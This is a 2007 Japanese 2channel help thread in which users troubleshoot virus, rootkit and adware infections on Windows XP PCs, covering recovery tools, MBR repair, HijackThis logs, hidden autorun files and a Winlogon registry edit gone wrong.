指示通りの操作で再スキャンしたところ何も検出されず無事に解決できました!
どうもありがとうございました!

308 :303:2007/01/18(木) 23:49:16
explorer.exe
更新日時:2003年4月3日
ファイルサイズ:974kB

VAIO PCV-W502B です。
OS CDがないので
説明書通りに
VAIOリカバリーツールからリカバリーしました

感染場所は
さまざまで Explorerを起動すると バスターが 
「Exploere.exe でウイルスが見つかりました」(駆除隔離出来ませんでした)
と出ます

また バスターの検索をすると
「PccVScan.exeでウイルスが・・・」
とでます

309 : ◆N9P3SuvBPo :2007/01/18(木) 23:53:14
>308
>「Exploere.exe でウイルスが見つかりました」
うわーやはり感染かー
正規のファイルに感染だからもう一度リカバリ…え?
>説明書通りに
>VAIOリカバリーツールからリカバリーしました
マジー!?

310 :303:2007/01/18(木) 23:57:11
まじです!

リカバリーは今週だけで3回しました・・・

311 : ◆N9P3SuvBPo :2007/01/19(金) 00:10:34
>310
ブートセクタないしマスターブートレコードもやられてんじゃないのか。
つかどーすればいいのか、俺の手に追えないんだけど…

他の方から何かアドバイスがあるかも知れません。

312 :名無しさん@お腹いっぱい。:2007/01/19(金) 00:39:32
複合感染型

複合感染型ウイルスはシステム領域感染型とファイル感染型の両方の特徴を持つウイルスです。
COMやEXEファイルに感染するだけでなく、ハードディスクやフロッピーディスクのシステム領域にも感染します。
このウイルスに感染したフロッピーディスクからコンピュータを起動すると、ウイルスがメモリに常駐するばかりか、ハードディスクのシステム領域にも感染します。
ただしシステム領域感染は先に説明したように最新のOSでは活動ができないため、この複合感染型ウイルスも現在ではほとんど存在しないものとなりました。


313 :名無しさん@お腹いっぱい。:2007/01/19(金) 03:44:39
>>312
XPらしいわけだが

VAIOというかメーカPCは詳しくないけど
リカバリ領域のデータがやられることってあるの?

314 :名無しさん@お腹いっぱい。:2007/01/19(金) 10:05:11
SONYに問い合わせしてみた?

315 :名無しさん@お腹いっぱい。:2007/01/19(金) 16:31:24
>303
fdisk /mbr
でマスターブートレコードを修復。

回復コンソールでブートセクタ修復。

316 : ◆N9P3SuvBPo :2007/01/19(金) 18:01:23
>313
俺が持っているNECのPC(OS:XPSP2)にもリカバリ領域があるけど、
その領域がウイルスによって破壊される可能性は、決してゼロではない。
と取り説に書いてあった。
だから、セットアップ完了後、速攻でリカバリCDを作成した。

>315
回復コンソールという手段は、こっちも考えていたのですが、
303さんはOSのCDが無いようなので、回復コンソールは使えないものと思われます。
回復コンソールをインストールして、OSの起動選択メニューから起動させる手や
6枚のFDDに回復コンソールをインストールして、そこから回復コンソールを
起動させる手もあるようですが。

マスターブートレコードの修復は
fixmbr

ブートセクタの修復は
fixboot [ドライブ名]
じゃなかった?間違っているかもしれんけど…
てか、fdisk /mbrでもMBRの修復ができるんだ…

317 :名無しさん@お腹いっぱい。:2007/01/19(金) 18:26:58
>316
CDないのか。すまん。
丁寧な説明には頭が下がります。

318 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:44:15
この前ここで教えてもらった通りにスパイウェアに感染したウィルスを駆除するようにしたんですができませんでした
もうドライブの中をすべてフォーマットしたりして直せませんかね?

319 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:57:18
>318
どのソフトで何をどうしたらどうなったのか・・・
と言ってくれないとレスしようがないです。

320 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:05:45
TrustyFilesを使った辺りからいきなりなりました。
Windows XPです。

321 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:07:12
>>318
セーフモードでやってみろ。

リカバリはまだ早すぎる。


322 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:16:32
>>321
セーフモードで起動してスキャン→なぜか無理でした
莫大なファイルの中から感染ファイルを見つける→とても無理でした
ウィルスバスター→今所持金が800円です…
すべてのドライブのフォーマット→できますか?これがリカバリという奴ですか?

323 : ◆N9P3SuvBPo :2007/01/19(金) 20:22:31
>318
>152ですよね?

疲れてるから他の方の指示に従ってください

324 : ◆N9P3SuvBPo :2007/01/19(金) 20:42:19
>322
OSはWindowsXPでしたよね。

「システムの復元」でも直らない?
セーフモードで起動して、システムの復元で正常に動作していた日付を
選んで復元。

325 :名無しさん@お腹いっぱい。:2007/01/19(金) 20:52:02
>>324
なるほど、今すぐやってみます!

326 :303:2007/01/19(金) 21:00:15
回復コンソールは
この別PCについていたOSのCDでも大丈夫なんですか?

そのCDをインストールしてもWindowsのUpdateが出来ないと聞いたので
使用はためらっていたのですが・・・

327 : ◆N9P3SuvBPo :2007/01/19(金) 21:04:16
>326
別PCのOSは何?

328 : ◆N9P3SuvBPo :2007/01/19(金) 22:15:41
303の別PCのOSがXPであれば、次の指示が出せるんですが…

329 :303:2007/01/19(金) 22:33:11
XP SP2です

330 : ◆N9P3SuvBPo :2007/01/19(金) 22:55:23
>329
そのCDで回復コンソールにログオンできるかだな。

最初に問題のPCを起動させて、BIOSの設定
(たぶん起動して一番最初に表示されるメーカーのロゴが出てきたらF2?を押す)
で、CD-ROMドライブを一番目に起動するように設定する。

そしてCD-ROMドライブを開いて、そのOSのCDを入れてPCを起動する。
CDから起動できれば、"青色の画面"が表示されて「セットアップの開始」というのが出てくる。
ここで修復[R]を押せば回復コンソールに入れるはず。(真っ暗な画面になる)
画面の指示に従って、Administratorのパスワードを入力して[Enter]を押す。
パスワードを設定していなければ、そのまま[Enter]を押す。

で、回復コンソールにログオンできると、以下の文字が表示されます
C:\WINDOWS>

ここまで確認してください。

331 :名無しさん@お腹いっぱい。:2007/01/19(金) 23:40:50
助ける気あるの?
復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?
回復コンソールも大半が複雑なウイルスは駆除出来ない
リカバリがお勧め
その後カスペやNODといったまともなソフトで免疫つけるべし
ただし最近はリカバリでも消せないウイルスも存在する

332 : ◆N9P3SuvBPo :2007/01/19(金) 23:49:22
>331
やれるだけやってみてるんだけどな
まあ、ダメ元でってことで

333 : ◆N9P3SuvBPo :2007/01/20(土) 00:13:13
どこかで詰まってるのかな…

334 :303:2007/01/20(土) 00:16:31
C:\WINDOWS>
でないですね・・・

普通に起動してしまいます・・・





335 : ◆N9P3SuvBPo :2007/01/20(土) 00:22:12
>334
普通にWindowsが起動しましたか…

BIOSの設定でCD-ROMドライブを一番最初に起動するように設定して、
OSのCDを入れたんですよね。
もしかして、BIOSの設定画面の言語が日本語じゃなくて英語で分からないとか?

336 :303:2007/01/20(土) 00:26:37
CDから起動は出来たんですけど

修復をおしてもなにも始まらず

そのうちインストール画面に

キャンセル押すと 普通に起動

こんな感じです

337 : ◆N9P3SuvBPo :2007/01/20(土) 00:36:54
>336
修復{R]押してしばらく待ったが
勝手にインストール画面に持っていかれたってことなの?

338 :303:2007/01/20(土) 00:43:20
勝手にじゃないです。
修復押してもなにもならないので
他のボタンを押すとインストール画面に・・・

339 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:43:24
>>331
>復元なんてしても99%のウイルスはウイルスごと一緒に復元しますけど?

んなぁこたぁ大方判ってるってw


悟ってやれ 。◆N9P3SuvBPoは

リカバリ領域も駄目な
末期癌の患者をあきらめず、見守っているんだ

俺なら悪魔のテンプレでも試すかなぁーでその後リカバリ
ただしvaioは残念ながら使わんよ。
警戒している人間は、まずリカバリCDか起動ディスクなりを準備しておくのが世の常ってもんだ。あとバックアップもな。

340 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:47:46
>>339
バックアップって最低限だと具体的にどこをバックアップしてればいいの?

341 : ◆N9P3SuvBPo :2007/01/20(土) 00:51:16
>338
回復コンソールが起動できれば、もうひと足掻きできたのですが。
リカバリしても直らない、ノートンのインストールが失敗する。
これはもうメーカー修理に出すしかないと言いたいのだけど、
保証期限が切れていたら有料になるしな…

>339
ここまで来たら本当にどうしたら良いのかサッパリです。

>俺なら悪魔のテンプレでも試すかなぁー
まさか!?
PC初心者板の「エロサイト見たら…助けて下さい!」スレ(今は無い)で、
一時期流行ったと言われる、『パソコンのトラブル解消法』ですな。
OS起動不可能になって強制的にリカバリさせる、禁断のテンプレ
別名:強制リカバリテンプレ

342 : ◆N9P3SuvBPo :2007/01/20(土) 00:55:30
>340
二度と取り戻せない大事なデータ

343 :339:2007/01/20(土) 01:05:10
>>340
良く考えてみ。

>>341
もう駄目ならソニーステーションでもいいんじゃないんですか?
ぐぐっても駄目でしょ?
出費覚悟でね。
俺なら何とかリカバリ領域まで何とかもっていくよ。おそらく
ソニーは使ったことがないが

344 : ◆N9P3SuvBPo :2007/01/20(土) 01:25:41
>343
そう。
「リカバリ領域 修復」や「リカバリ領域の修復方法」で
ぐぐっても有力と言える情報は得られなかった。
メーカーに修理に出すか、リカバリCD取り寄せになるだろう。
残念ながらここまでのようですね…

345 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:35:54
vaioでリカバリユーティリティ入ってたなら同時にリカバリディスク作成機能もついてるはずなんだけどな
いまさらだけど説明書にもリカバリディスクの作成は推奨事項で載ってるし

346 : ◆N9P3SuvBPo :2007/01/20(土) 01:52:42
さすがに日中バイト、夜は遅くまでここでサポートは
正直言って辛いな…明日、明後日休みだからいいけど

347 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:55:52
>>345
いや 多分作成を知らなかったんだろう。
てゆうかもう完全手遅れ状態

348 : ◆N9P3SuvBPo :2007/01/20(土) 01:57:39
>347
こういう経験も勉強にひとつとなるし
万が一に備えて保険は絶対必要ってことですね。

349 : ◆N9P3SuvBPo :2007/01/20(土) 02:36:49
ちょっと待て…
リカバリ領域がやられたら、リカバリが出来なくなるんじゃないの?
あの質問者はちゃんとリカバリしたと書いてあるから、
リカバリ領域が破壊されたというのは、考えられないんじゃない?

でも、どの道修理orリカバリCD取り寄せは確定ですな。
もう寝よう…

350 :名無しさん@お腹いっぱい。:2007/01/20(土) 02:54:45
>>349
多分修理は確定 またはCD取り寄せ
お疲れさま。また明日

351 :名無しさん@お腹いっぱい。:2007/01/20(土) 03:33:39
vaioだったら5000円くらいでリカバリディスク買うことができるからまずはそれやってみてからだよね

352 :名無しさん@お腹いっぱい。:2007/01/20(土) 06:57:44
前にvaioのプロセス見たけど
なんか独特なのがウジャウジャ動いてたな

353 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:46:21
最近、2ちゃん専ブラJaneやSleipnir2を使ってると、当該ソフト(ひどい時にはウィルスバスターを始めクリックするソフト全て)が
CPUの使用率を100パーセント使ってしまい再起動を余儀なくされます。
この様な挙動を示す物って何があるのでしょうか?またどのように対策すれば良いのでしょうか。アドバイスをお願いします。

354 :名無しさん@お腹いっぱい。:2007/01/20(土) 12:25:14
>>353
リカバリ

355 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:49:07
質問させていただきます。

【使用OS】 WindowsXP Pro SP2
【MicrosoftUpdate】 最新です。
【使用セキュリティソフト】 Symantec Antivirus Ver10.0
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出されない。

【どんな症状が出るか】 一定時間ごとにIEが起動して中国のサイトが勝手に開く。
接続されているすべてのドライブにアクセスするとクイックランチャーに化け文字したlinkファイル、
ディスクトップにIEのショートカット、プログラムにIEのショートカット、スタートアップに
IEのショートカットが作成される。それらは全て同じ中国のサイトにつながる。

【症状が出る前に何をやったか】 アップローダーから落とした動画を右クリックでスキャンしようと
して誤ってプレイヤーで実行してしまった、その時承認がどうのこうのというアラートが出て
やめたが、それが一番くさい。

【症状を解決しようとどのような処置を取ったか】 SpybotやAD-AWARE、オンラインスキャンもいくつか
試したが、Cookieが検出され削除を行ってくれるが解決されず。

【その他の質問】 しかたがないので、別のHDDに新しくOSをインストールしたが、接続していた他の
ドライブ(USBやATA接続の)にアクセスすると「pagefile.exeが見つかりません」というアラートが
出てクイックランチャーに化け文字したlinkファイル、ディスクトップにIEのショートカット、プログラムに
IEのショートカット、スタートアップにIEのショートカットが作成される。
これでは他のドライブのデータが使えないし、移そうにも何を省けばいいかが分かりません。

解決策ご存じの方がいらっしゃればご指導お願いいたします。


356 :名無しさん@お腹いっぱい。:2007/01/20(土) 17:42:03
>>355

シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html

357 : ◆N9P3SuvBPo :2007/01/20(土) 19:10:23
さっき繋がらなかったから閉鎖された?って思ったけど
今ようやく繋がるようになってきたっすね。

>355
ちょっと試してみたいことあるんだけど、協力していただけますか。
内容は「ntbtlog.txt」の貼り付けです。

PCを起動してF8キーを連打します

Windows拡張オプションで[ブートのログ作成を有効にする]を選択し、
Windowsを通常モードで起動します

CドライブのWindowsフォルダ内に[ntbtlog.txt]という名前の
テキストファイルが作成されますので、
これをアップローダー掲示板にupしてもらえますか。

358 :名無しさん@お腹いっぱい。:2007/01/20(土) 19:22:35
中華製のトロイ?
これからはこういうのが増えるのかな

359 : ◆N9P3SuvBPo :2007/01/20(土) 19:35:37
>358
しかもこいつな、マイクロソフトの名前を騙ったフォルダを作成する厄介ものなんでね。

360 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:16:20
>355です。
>356
>357
レスありがとうございます。
>356
自分がノートンを使っているので、シマンテックのオンラインスキャンはしていませんでした。
試してみます。
>357
分かりました。アップローダーはどこでもいいんですか?このスレッドの決まりのロダとか
あるんでしょうか?

361 : ◆N9P3SuvBPo :2007/01/20(土) 20:20:00
>360
どこでもいいよ。

362 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:44:59
>360です。
>361
うpしました。
ttp://www-2ch.net:8080/up/download/1169292864999500.FKzrWN
pass:122333


363 : ◆N9P3SuvBPo :2007/01/20(土) 21:34:29
>362
見た限りでは、怪しげなルートキットは無いようですね。
DaemonToolsが作成するルートキットはありますが、こちらは問題ありません。

見逃しがあるかも知れないので、RootkitBusterでスキャンしてください。

364 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:38:00
> DaemonToolsが作成するルートキットはありますが

まじっすか


365 : ◆N9P3SuvBPo :2007/01/20(土) 21:44:21
>364
これですよ
>d347bus.sys
何故かRootkitBusterで検出対象になってるんですね。


366 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:48:11
PC初心者板でもDaemonToolsは何故か良くないものとしての反応見かけたことある
仮想ドライブくらいBHAでもあるのになんでだろうな

367 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:55:56
トロイの木馬名 New malware.i

<アプリケーションによる 〜 アクセス要求>
プロクラム protector.exe がアクセスを要求しています、と何度も出てきて困っています・・・

重要なファイルにも感染したらしく、削除以外に何かいい方法はないでしょうか?

・・・てか、かなり重要なファイルなのか、ファイルがプロテクトされていて削除もできないと出てきます・・・

368 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:15:26
>>367
Windowsシステムフォルダ内に "msaconfigurez.exe" というファイルを作成が
できていないか確認してください。


369 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:16:51
>362です。
>362
そうですか、ありがとうございました。

駆除できなかった場合、システムはあきらめて再インストールしてもよいのですが
問題は接続されていた他のドライブなんですよ。
前にも書きましたが、新しく別のHDDにインストールしたOSで立ち上げて前から接続していた
USBのHDDを繋げてアクセスしたらディスクトップやスタートアップやらにショートカットが作成
されましたから。
一応調べてたら、こういう類はドライブのルートにautorun.infやautorun.exeを作成するとあったので
検索して削除しましたがだめでした。
「不可視ファイルを表示する」にしていても見えないようになっているんですかね?
触れないのであればドライブ内のデータだけコピーツールで他所に移動してしまうだけなんですが。
直接クリックしない限りは発動しなかったので。

長々と質問ばかりですみません。

370 :368:2007/01/20(土) 22:17:03
訂正
×を作成が
○が作成

371 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:19:48
>362
そうですか、ありがとうございました。

間違いました。
>363
そうですか、ありがとうございました。

でした。

372 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:23:45
http://thumb.imgup.org/file/iup318424.jpg

373 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:26:57
>>369
マイコンピュータ→コントロールパネル→フォルダオプション→表示タブをクリック
1.「すべてのファイルとフォルダを表示する」にチェック
2.「登録されているファイルの拡張子は表示しない」のチェックを外す
3.「保護されたオペーレーションシステムファイルは表示しない」のチェックを外す

3をやったのかな?

374 :369:2007/01/20(土) 22:27:27
>369
>直接クリックしない限りは発動しなかったので。

ドライブをダブルクリックという意味です、エクスプローラーでは発動しなかったので。



375 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:28:28
>>368
すいません、検索法かなにかはあるんでしょうか?
パソコンにあまりなれてないので・・・質問ばかりですみません

376 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:30:12
>373
あ、3はやってませんでした。
やってみます。

377 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:39:59
>>375
スタート→マイコンピューター→CドライブをクリックWindowsシステムフォルダをクリック

378 : ◆N9P3SuvBPo :2007/01/20(土) 22:47:58
なんかRootkitによって隠されたファイルって
>373しても見えなくなっているんじゃない。

だから該当するサービスを無効にすればいいわけだが、
当然system権限によって実行されているわけなので、
一筋縄ではいかないという。

379 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:53:51
Rootkitのファイルは
373をしても見れない不可視ファイルを見る方法が有るらしいが・・・
俺は知らん
まぁ一応すべてをやるだけはやってみてもよかろう

380 : ◆N9P3SuvBPo :2007/01/20(土) 22:57:23
一度ルートキットバスターのログ貼りして、それでルートキットが
見付かれば対処して行く形になるんだけど

381 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:58:05
ちょっとすれ違いかもですが質問です。

電話が盗聴されるように、パソコン画面も盗聴(?)されたりするんでしょうか?
(ハッキングっていうのかな?)

当方、以前なぜか判らないのですが、興信所から身辺調査をされてました。
その時のことなんですが、パソコンを使っているとADSLなのに通信速度が極端に落ちて
いたのです。もうISDNくらいの速度まで落ちてました。
んで、それ関連のスレッドに質問したところ「回線にノイズが入ってるんじゃね?」と
いわれあまり気にかけてなかったのです・・・。

今思えば、これって興信所がパソコンに入ってきて自分の個人情報を閲覧してたって
ことも考えられますよね?実際問題技術的にどうなんでしょうか?可能なのでしょうか?

382 :369:2007/01/20(土) 23:20:47
>380
RootkitBusterでのログです。
もしよろしければ、調べてみて頂けないでしょうか。

ttp://www-2ch.net:8080/up/download/1169302420410051.cC9ZmZ
pass:122333



383 : ◆N9P3SuvBPo :2007/01/20(土) 23:36:29
>382
RootkitBusterのログには問題ありません

しかし、何故[d347bus.sys](DaemonTools)が検出されるのかわからん…

384 : ◆N9P3SuvBPo :2007/01/21(日) 00:36:36
…と、すると、あとはHijackThisの処理で何とかなりそうな気がしますね。

385 :名無しさん@お腹いっぱい。:2007/01/21(日) 00:42:22
>>377
その名前のフォルダはなかったのでたぶんWindowsというフォルダの事を言ってるのだと思いますが、その中には、そのファイルはありませんでしたよ

386 :382:2007/01/21(日) 00:45:02
>383
ありがとうございました。

>373さんにご指摘いただいたように、私の初歩的なミスだったので隠しファイルは見ることが
出来るようになったのでautorun.infとpagefile.exeを消すことによってショートカットやリンクが
勝手に作成されることはなくなりました。また再起動しても各ドライブにautorun.infとpagefile.exeが
作成される事はありませんでした。
ただ、一定時間ごとにIEが勝手に起動して中国のサイトを開くのはそのままです。
これは、ノートンやSpybot・AD-AWAREその他のオンラインスキャンでも駆除出来ません。



387 :386:2007/01/21(日) 00:47:25
>384
HijackThisですか。
試してみます。

388 : ◆N9P3SuvBPo :2007/01/21(日) 00:53:26
おっとっと、HijackThisのログはここに貼り付けてもらっても構いませんよ。
サイズは数KBくらいですので

389 :387:2007/01/21(日) 01:16:55
>388
ありがとうございます。
説明を読んでみましたが、私では判断しかねるようなのでお願いいたします。
また、直貼りするには文が長すぎるのでうpしました。
ご面倒とは思いますがよろしくお願いします。

hijackthis log
ttp://www-2ch.net:8080/up/download/1169309387449250.UN2pCJ
pass:122333


390 :名無しさん@お腹いっぱい。:2007/01/21(日) 01:53:06
>>381
パソコン画面の盗聴は可能らしい。CRTからの漏れ電磁波を拾うとか。
でも興信所ならパソコン画面関連より電話盗聴の可能性が高いと思う。
建物のすぐ外の電話回線の設備に盗聴器が仕掛けられていたら通信速度が下がってもおかしくない。

391 : ◆N9P3SuvBPo :2007/01/21(日) 02:13:26
なんかshareEDGEではPCANotify.dllをトロイと言ってるがどうなんだろう。
(higaitaisaku.comではこのエントリーFIX対象から外されてるし)

>389
P2Pソフトの残骸が残ってますぜw
今はこれだけFIXしてください。
O1 - Hosts: 80.175.31.63 www.winmx.com

こちらの3つのファイルなんですが、
C:\Program Files\real\atloader.dll
C:\Program Files\real\adx.exe
C:\WINDOWS\SYSTEM32\PCANotify.dll
ファイルのプロパティを表示して、
・作成日
・著作権
・会社名
を教えてもらえますか?

392 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:19:00
>>385
Windows 95/98/Me の場合
<Windowsシステムフォルダ> = C:\Windows\System
  Windows NT/2000 の場合
<Windowsシステムフォルダ> = C:\WinNT\System32
Windows XP の場合
<Windowsシステムフォルダ> = C:\Windows\System32

これだろ。
初心者スレ行ったほうがいいよ

393 :387:2007/01/21(日) 02:47:54
>391
こんな遅い時間にありがとうございます。

3つのファイルに関しては以下の通りでした。

atloader.dll
作成日:2006年12月31日、16:26:22
著作権:
会社名:Microsoft Corporation

adx.exe
作成日:2006年12月30日、16:20:56
著作権:
会社名:Microsoft Corporation

PCANotify.dll
作成日:2006年3月8日、12:00:00
著作権:Copyright 2006 Symantec Corporation
会社名:Symantec Corporation

394 : ◆N9P3SuvBPo :2007/01/21(日) 03:27:03
>393
ふむ、確かにログに目立った問題はありませんが、
何故中華系のサイトが開くんだろうね。

いちおう、ごみ掃除でもしとかないか。
インターネットオプション→ファイルの削除(全てのオフラインにチェックを付ける)
スタート→ファイル名を指定して実行→%temp% と入力してOK
Ctrl+Aで全て反転させて、中にある物を削除

395 :名無しさん@お腹いっぱい。:2007/01/21(日) 06:32:27
【使用OS】  「windows XP」
【Windows Updateの状態】  「昨日更新した」 
【使用セキュリティソフトとバージョン】  「Norton SystemWorks 2005」
【セキュリティソフトの定義ファイルは最新の状態であるか】  「最新」 
【スパイウェア対策ソフト】  「Spybot - Search & Destroy」 
【ルータの有無】  「有り」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】  「忘れた、検出さ
れたのは削除済み」
【どんな症状が出るか】  「メールが勝手に送信される(メッセージスキャンで送信されず)
後、C:に.nlsファイルが作成される、1000〜2999で(cp1000,nlsって感じで)」
【症状が出る前に何をやったか】  「ttp://www.emuasylum.com/index.php サイトの
R@Mの機種ページを開いた・・・・・」
【症状を解決しようとどのような処置を取ったか】  「ノートンやら無料スキャンやウェブ
上スキャンを試した、検出されたのは一通り削除済み多分・・・・でも治らないorz」
【その他の質問】  「一昨日からこの状態・・・・リカバリしようにもディスクが行方不明・・・」

396 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:41:50
>>395
>【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】  「忘れた、検出さ れたのは削除済み」

ログビューアに「リスク名」が残っていませんか?


397 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:52:19
>>392
ありがとうございます!フォルダを見つけられました。
>>377氏に教えてもらったファイルは見つかりませんでした。スキャンの時の情報からここに問題があるんだと思いますが・・・
 
次になにか不明な事があったら初心者スレに行ってみます

398 :395:2007/01/21(日) 11:09:33
>>396
なかったよ・・・

それより大変なというより、アホなことをしてまった・・
ノートンのHPで、症状が似てるウイルス情報が有ったので
>>ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.amitis.c.html
にしたがって、レジストを弄ってたら
ログオン出来なくなった・・・・・
正確には、ログオン>情報読み込み>ログオフ>情報保存の無限ループに
多分、関係ない?Loadを削除てたせいかも・・・
レジスト保存してても、ログオン出来ないから修正も出来ない
助けて・・・・(´Д⊂

399 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:22:53
>>395
スペック強化&消耗品交換とセキュリティソフトの最新版導入を兼ねて、
OS再インストールしたほうがいい




400 :名無しさん@お腹いっぱい。:2007/01/21(日) 14:43:14
これか?
http://72.14.235.104/search?q=cache:2zAbIudo78UJ:www.ipa.go.jp/security/topics/newvirus/badtrans-b.html+.nls+%E3%83%A1%E3%83%BC%E3%83%AB%E3%80%80%E9%80%81%E4%BF%A1&hl=en&ct=clnk&cd=6&client=opera

401 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:41:52
Win32:Vibpack [Wrm] 
これってウィルスですか?
どんなウィルスか教えてください

402 : ◆N9P3SuvBPo :2007/01/21(日) 16:53:52
>398
居る?
これは間違い無くシマンテックが悪いですね。

403 :395:2007/01/21(日) 17:43:18
>>399
へぼPCだから、OS再インストールはムリポ、買ってきたらできるけど
・・・・・落とすか・・・・
でもリカバリディスク見つかったから、もうそれしかないかも・・・・

>>400
今沖田・・・・
いや、自分が悪いよ・・・不精してフルスキャンしなかったからね
でも、今まで色々な物でスキャンしてたんで
またスキャンすんのかよ、感じだったんだよ・・・

やはりログオンをスルーする方法なんて無いか・・・
リカバリはしたくないんだよ、パスとかC:に保存してしまってるから
ってPCが、使え無いんじゃそれ以前だけどね・・・

404 : ◆N9P3SuvBPo :2007/01/21(日) 17:48:06
なんとかしてでもデスクトップにたどり着くことできないものかな

ようこそ画面のところで[Ctrl+Alt+Delite]でタスクマネージャ出せたら
[タスクの実行」から[c:\windows\explorer.exe]を実行ってなかんじで

405 :399:2007/01/21(日) 18:00:57
>>395
失って困るものはCドライブには置かない、バックアップが必要なデータは確実にバックアップもする、
専門店の技術員にでも相談して決断するしかないな

406 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:02:56

explorer.exe以下の %Windir%\MVH.exe"だけを削除すればよかったのか
この書き方だと確かに間違えるかもな


407 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:05:55
救出用にknoppix(CDから起動するlinux)を使えばファイルを待避させたり書き換えたり出来るよ。

408 :395:2007/01/21(日) 18:07:04
>>404
無理でした・・・・

もう、リカバリしかないかもしれんね・・・・
データー復元ソフトってどうなんだろ
ちょっと調べてくる

409 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:07:54
>>401

だれかこれ頼みます・・・ (´・ω・`)

410 : ◆N9P3SuvBPo :2007/01/21(日) 18:14:56
ようこそ画面のループは
例えセーフモードだろうが、全快正常起動時の構成だろうが無意味だろうね。

>406
あと、正しくは
修正前="Userinit" = "userinit.exe %Windir%\MVH.exe"
修正後="Userinit" = "userinit.exe, "

411 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:21:03
>>410
そうですね
しかしこの領域はレジバックアップしててもあとから修正できないし おっそろしいですね


412 :395:2007/01/21(日) 18:27:56
>>405
まったくもってそのとおりです、返す言葉もない
まあ、大事なものっていったら、パスぐらいだけどね
ゲーム(エロゲとエミュ)とか有るけど、それはどうにでもなる
セーブデーターは勿体無いけど・・・・

>>406
何か足りないなと思いながらも消した自分のボンミスです・・・・

>>407
なんと、そんな物が有るとは
試してみます

皆さんこんな奴の為に色々ありがとう( ´Д⊂ヽ

413 :406:2007/01/21(日) 18:30:02
>>410
正確には
修正後="Userinit" =%Windir%userinit.exe,じゃないすか?
おいらのxpはそうなってます

414 : ◆N9P3SuvBPo :2007/01/21(日) 18:30:45
>409
とりあえず検索してみて、ウイルスなら自力で解決を図ってみるか、
無理なら大事なデータをバックアップ取ってリカバリーですな。

>411
Winlogonってキーはようこそ画面のところで読みこまれますからね。
当然セーフモードでも読みこまれるため、このレジストリ領域が
やられてしまうと復旧は困難になる。

415 : ◆N9P3SuvBPo :2007/01/21(日) 18:33:27
>413
え、本当に正確なのはこうじゃないの?
"Userinit" =c:\windows\system32\userinit.exe,
自分のXPはこうなってた。
環境によって違うかもしれませんね。

416 :406:2007/01/21(日) 18:39:45
>>415
そうでした
%Windir%ってwindowsフォルダのことでしたorz
おいらのxpもデフォだからsystem32以下にありまつ

417 :名無しさん@お腹いっぱい。:2007/01/21(日) 19:46:13
     。oO
(゚д゚)―┛(スパーッ)

        。oO
つポイッミ―┛

  。oO
―┛

(゚д゚)<質問すっぞ
【使用OS】 XPだ
【MicrosoftUpdate】 日本語で書け
【使用セキュリティソフト】 なんだ?それ
【セキュリティソフトの定義ファイルは最新の状態であるか】 (。д゚)はぁ?
【ルータの有無】 無線だ
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 HDDに負担がかかることなんてやるわけねーだろが
【どんな症状が出るか】 とにかく重たいんだよ
【症状が出る前に何をやったか】 はぁ?(゜д゜)誰に向かって口聞いてんだ
【症状を解決しようとどのような処置を取ったか】 何もわからねーのにどうすることもできねーだろが
【その他の質問】 なんで重くなったのか知らないのか?(゚д゚)あ?

418 : ◆N9P3SuvBPo :2007/01/21(日) 19:53:08
ポイ捨てする人には答えられません。
以上!

419 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:18:16
>>417
ひでーなコレ

420 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:19:44
>>417
こりゃやる気ないな、仮に初心者であってもある程度書けるのに・・・
単なるスレ汚しか、釣りだな。

>【MicrosoftUpdate】 日本語で書け
開国する前の江戸時代にでも戻れよwww

421 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:38:12
店に質問に来る客は半数がそんな態度だよw

422 : ◆N9P3SuvBPo :2007/01/21(日) 21:46:08
>417
良いか?
ここに質問に来る人達は自分らの状況を一生懸命に伝えようと頑張っています。
情報がある程度でも伝われば、我々がなんとか解決に導こうと
色々なアドバイスを与えたりします。
しかし、よほどの重症となっている場合は最終的にリカバリor修理という結果になってしまいますが。

423 :417:2007/01/21(日) 22:10:27
はいはい捨てればいいんだろ!

       。oO
ポイつミ―┛

|||| 。oO
―┛

[ごみ箱]

それで俺様のPCはどうなるんだ?
答えろうじ虫!


    。oO
[ごみ箱]

424 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:13:52
>>422
